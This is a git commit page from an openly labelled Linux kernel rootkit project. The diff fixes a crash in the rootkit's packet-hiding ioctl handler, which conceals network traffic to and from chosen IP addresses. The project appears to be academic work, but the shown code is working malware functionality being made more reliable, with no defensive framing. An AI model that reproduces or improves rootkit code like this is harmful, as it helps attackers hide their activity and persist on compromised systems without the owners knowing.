Avoid directly accessing sarg to fix crash on rkcheck vm - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 9a24a6beaa28e244d39ce9e006aa183f119016c6
parent 4c779b45cea73696e6d59d22e3bdb30bd3a715c5
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sun, 20 Dec 2020 17:22:19 +0100

Avoid directly accessing sarg to fix crash on rkcheck vm

Diffstat:
M src/channel.c  | 12 ++++++------

1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/src/channel.c b/src/channel.c
@@ -251,18 +251,18 @@ handle_packhide(unsigned long arg)
     } else if (!copy_from_user(buf, sarg, BUFLEN)
         && (strstr(buf, ":") || strstr(buf, ".")))
     {
-        if (sarg[0] == (char)1) {
+        if (buf[0] == (char)1) {
             if (!rootkit.hiding_packets) {
                 hide_packets();
                 DEBUG_NOTICE("[g7] packet hiding on\n");
             }
 
-            hide_ip(&sarg[1]);
+            hide_ip(&buf[1]);
             rootkit.hiding_packets = 1;
-            DEBUG_INFO("[g7] hiding packets from/to ip address %s\n", &sarg[1]);
-        } else if (sarg[0] == (char)-1) {
-            unhide_ip(&sarg[1]);
-            DEBUG_INFO("[g7] unhiding packets from/to ip address %s\n", &sarg[1]);
+            DEBUG_INFO("[g7] hiding packets from/to ip address %s\n", &buf[1]);
+        } else if (buf[0] == (char)-1) {
+            unhide_ip(&buf[1]);
+            DEBUG_INFO("[g7] unhiding packets from/to ip address %s\n", &buf[1]);
         } else
             return -ENOTTY;

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs